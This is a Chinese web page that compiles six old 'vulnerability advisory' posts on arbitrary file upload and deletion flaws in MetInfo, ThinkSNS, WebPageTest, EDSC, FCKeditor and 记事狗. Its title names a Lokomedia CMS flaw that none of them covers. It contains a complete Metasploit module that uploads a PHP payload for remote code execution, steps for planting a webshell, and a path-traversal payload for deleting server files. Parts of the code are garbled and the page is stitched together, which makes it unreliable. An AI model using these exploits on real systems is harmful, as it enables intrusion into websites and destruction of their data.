CMS Lokomedia 1.5任意文件上传漏洞漏洞预警

“lzy21003009”通过精心收集，向本站投稿了6篇CMS Lokomedia 1.5任意文件上传漏洞漏洞预警，下面小编给大家整理后的CMS Lokomedia 1.5任意文件上传漏洞漏洞预警，供大家阅读参考。

篇1：MetInfov5.1.3 任意文件上传漏洞漏洞预警

MetInfo 23号发布了新版本5.1.5，修补了本文提到的漏洞，当然严格来说应该是任意变量覆盖漏洞....

ps：欢迎各种形式，首发t00ls.net

注：请勿利用本文内容从事一切非法活动，否则后果自负

author:my5t3ry

废话不多说，看代码：

include\common.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql;$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}

metinfo系统通过查询数据库的{$tablepre}config表，并将获取的结果通过foreach循环初始化表名变量，其中的

是通过代码

$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);

来初始化的，然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库，

其中的$met_message变量就是前面foreach循环初始化的变量……

我们可以覆盖$tablepre变量使表名初始化失败，进而提交表名变量.....

我找了个后台的上传页面，通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表，构造上传漏洞，

MetInfov5.1.3 任意文件上传漏洞漏洞预警

，

exp：任意文件上传

任意文件上传

篇2：ThinkSNS又一个任意上传文件漏洞漏洞预警

某模块未对上传文件类型进行验证，可上传任意文件

​

代码产生位置

apps\wap\Lib\Action\IndexAction.class.php

263行

if(!empty($_FILES['pic']['name'])) { // 自动发一条图片微博

$data['pic']   = $_FILES['pic'];

$data['content'] = '图片分享';

$data['from']  = $this->_type_wap;

$res = api('Statuses')->data($data)->upload();

}

未对文件类型过滤

访问wap 模块

发一条微博并传图

firebug 地址

​

去掉small_然后访问

www.myhack58.com/data/uploads//1023/17/50865d481c217.php

修复方案：

对上传类型要进行检查

篇3：WebPageTest任意php文件上传漏洞预警

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' =>“WebPageTest Arbitrary PHP File Upload”,

'Description' =>%q{

This module exploits a vulnerability found in WebPageTest's Upload Feature. By

default, the resultimage.phpfile does not verify the user-supplied item before

saving it to disk, and then places this item in the web directory accessable by

remote users. This flaw can be abused to gain remote code execution.

},

'License' =>MSF_LICENSE,

'Author' =>

[

'dun', #Discovery, PoC

'sinn3r' #Metasploit

],

'References' =>

[

['OSVDB', '83822'],

['EDB', '19790']

],

'Payload' =>

{

'BadChars' =>“\x00”

},

'DefaultOptions' =>

{

'ExitFunction' =>“none”

},

'Platform' =>['php'],

'Arch' =>ARCH_PHP,

'Targets' =>

[

['WebPageTest v2.6 or older', {}]

],

'Privileged' =>false,

'DisclosureDate' =>“Jul 13 2012”,

'DefaultTarget' =>0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])

], self.class)

end

def check

peer = “#{rhost}:#{rport}”

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(“#{target_uri.path}.”)

res1 = send_request_raw({'uri'=>“#{base}/index.php”})

res2 = send_request_raw({'uri'=>“#{base}/work/resultimage.php”})

if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and

res2 and res2.code == 200

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def on_new_session(cli)

if cli.type != “meterpreter”

print_error(“No automatic cleanup for you. Please manually remove: #{@target_path}”)

return

end

cli.core.use(“stdapi”) if not cli.ext.aliases.include?(“stdapi”)

cli.fs.file.rm(@target_path)

print_status(“#{@target_path} removed”)

end

def exploit

peer = “#{rhost}:#{rport}”

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(“#{target_uri.path}.”)

p = payload.encoded

fname = “blah.php”

data = Rex::MIME::Message.new

data.add_part(

“

'multipart/form-data', #Content Type

nil, #Transfer Encoding

”form-data; name=\“file\”; filename=\“#{fname}\”“ #Content Disposition

)

print_status(”#{peer} - Uploading payload (#{p.length.to_s} bytes)...“)

res = send_request_cgi({

'method' =>'POST',

'uri' =>”#{base}/work/resultimage.php“,

'ctype' =>”multipart/form-data; boundary=#{data.bound}“,

'data' =>data.to_s

})

if not res

print_error(”#{peer} - No response from host“)

return

end www.xxxxo.com

@target_path = ”#{base}/results/#{fname}“

print_status(”#{peer} - Requesting #{@target_path}“)

res = send_request_cgi({'uri'=>@target_path})

handler

if res and res.code == 404

print_error(”#{peer} - Payload failed to upload“)

end

end

end

篇4：网上商城EDSC V2.1 任意文件上传漏洞漏洞预警

这个漏洞很久了,可是在网上找了找还没有发现有人提及过,所以还是公布出来和大家分享一下.

本人不是程序员,所以代码方面没有办法讲解,请见谅!

网上商城ED-SC V2.1

默认后台路径www.xxx.com/admins

默认上传路径www.xxx.com/admins/upfile_flash.asp

还有N多默认，但是有这两个就足够了，甚至可以说找到/upfile_flash.asp的路径就可以了，

网上商城EDSC V2.1 任意文件上传漏洞漏洞预警

，

利用过程写一下吧,要不很多和我一样菜的朋友看不懂

既然是上传漏洞当然少不了明小子出场.

直接用明小子上传就可以了

上传路径www.xxx.com/admins/upfile_flash.asp

提示已经上传，接者访问马儿地址www.xxx.com/admins/diy.asp

​

篇5：FCKEditor FileUpload函数任意文件上传漏洞漏洞预警

漏洞版本:

FCKeditor 2.6.8

漏洞描述:

BUGTRAQ ID: 56735FCKeditor是一款开放源码的HTML文本编辑器，

FCKEditor FileUpload函数任意文件上传漏洞漏洞预警

。FCKEditor 2.6.8及其他版本在'FileUpload()'函数的实现上存在安全漏洞，攻击者可利用此漏洞上传任意文件到受影响计算机，

<* 参考Mostafa Azizi*>

安全建议:

厂商补丁：FCKeditor---------目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：www.fckeditor.net/

​

篇6：记事狗任意文件删除漏洞预警

利用条件：

1.仅限于windows主机,linux无效（至少我本机就不行）

2.已注册用户

3.需要删除的文件可读写

在modules/ajax/event.mod.php中

www.xxxx.com

#保护性删除图片

function doUnlink($pic){

if(!$pic) return false;

0 = trim(strtolower(end(explode(”.",$pic))));

$exp = '././images/event/[0-9]{10}'.MEMBER_ID.'_b.'.0;

if(ereg($exp,$pic)){

unlink($pic);

unlink(strtr($pic,'_b.','_s.'));

return true;

}else {

return false;

}

}

该函数在 onloadPic中被调用

if($_FILES['pic']['name']){

//省略.....................

$hid_pic = $this->Post['hid_pic'];

$eid = (int) $this->Post['id'];

$this->doUnlink($hid_pic,$eid);

//省略.............

}

只要$_FILES['pic']['name'] 不为空，然后我们就可以构造hid_pic了

hid_pic 的内容为：

././images/event/1234567890{MEMBER_ID}_b.{你要删除的文件的后缀}/../../../{你要删除的文件}

比如我们要删除./data/install.lock文件，而且我的MEMBER_ID为2 则：

././images/event/12345678902_b.lock/../../../data/install.lock

本地测试成功

实际利用：

在 index.php?mod=event&code=pevent

上传抓包，然后在hid_pic底下填写././images/event/12345678902_b.lock/../../../data/install.lock 即可

修复方案：

do it yourself

【CMS Lokomedia 1.5任意文件上传漏洞漏洞预警】相关文章：

1.强制删除任意文件以及文件夹漏洞预警

2.Apache Struts远程命令执行和任意文件覆盖漏洞漏洞预警

3.Nginx 安全漏洞 (CVE4547)漏洞预警

4.毕业论文选题系统上传漏洞漏洞预警

5.CVE0497 漏洞利用学习笔记漏洞预警

6.网马解密初级篇漏洞预警

7.COCOON Counter统计程序漏洞总结漏洞预警

8.EFront 3.6.9 社区版多个漏洞漏洞预警

9.天下马ASP收信程序漏洞漏洞预警

10.bug漏洞处理机制系统bugtracker漏洞预警